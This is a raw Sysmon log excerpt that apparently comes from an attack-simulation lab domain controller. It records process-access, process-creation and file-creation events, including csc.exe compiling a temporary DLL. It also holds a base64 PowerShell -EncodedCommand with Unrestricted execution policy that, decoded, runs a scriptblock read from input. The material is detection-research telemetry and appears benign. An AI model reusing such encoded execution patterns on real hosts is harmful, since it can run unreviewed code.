13:54:40.193{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004361Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.193{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004360Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.193{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004359Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.193{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004358Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.193{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004357Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.193{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-85A0-5FCF-D900-000000009101}1596C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004356Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.193{10ACEC4A-85A0-5FCF-D800-000000009101}50444852C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{10ACEC4A-85A0-5FCF-D900-000000009101}1596C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004355Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.196{10ACEC4A-85A0-5FCF-D900-000000009101}1596C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RES9258.tmp" "c:\Users\Administrator\AppData\Local\Temp\CSCD396A5A81A6A49D2B1D94F5F0587C0.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-859F-5FCF-CB41-080000000000}0x841cb0HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{10ACEC4A-85A0-5FCF-D800-000000009101}5044C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\v0bxnvba.cmdline" 10341000x80000000000000004354Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.099{10ACEC4A-859F-5FCF-D300-000000009101}50044516C:\Windows\system32\conhost.exe{10ACEC4A-85A0-5FCF-D800-000000009101}5044C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004353Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.099{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004352Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.099{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004351Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.099{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004350Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.099{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004349Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.099{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004348Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.099{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004347Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.099{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004346Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.099{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004345Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.099{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004344Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.099{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-85A0-5FCF-D800-000000009101}5044C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004343Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.099{10ACEC4A-859F-5FCF-D600-000000009101}46244908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-85A0-5FCF-D800-000000009101}5044C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c1edb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c19a9|UNKNOWN(00007FF81929B7BF) 154100x80000000000000004342Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.100{10ACEC4A-85A0-5FCF-D800-000000009101}5044C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\v0bxnvba.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-859F-5FCF-CB41-080000000000}0x841cb0HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{10ACEC4A-859F-5FCF-D600-000000009101}4624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAaQBmACAAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBsAHQAIABbAFYAZQByAHMAaQBvAG4AXQAiADMALgAwACIAKQAgAHsACgAnAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnAAoAZQB4AGkAdAAgADEACgB9AAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 11241100x80000000000000004341Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.083{10ACEC4A-859F-5FCF-D600-000000009101}4624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\v0bxnvba.cmdline2020-12-08 13:54:40.083 11241100x80000000000000004340Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:40.083{10ACEC4A-859F-5FCF-D600-000000009101}4624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\v0bxnvba.dll2020-12-08 13:54:40.083 10341000x80000000000000004522Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.988{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004521Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 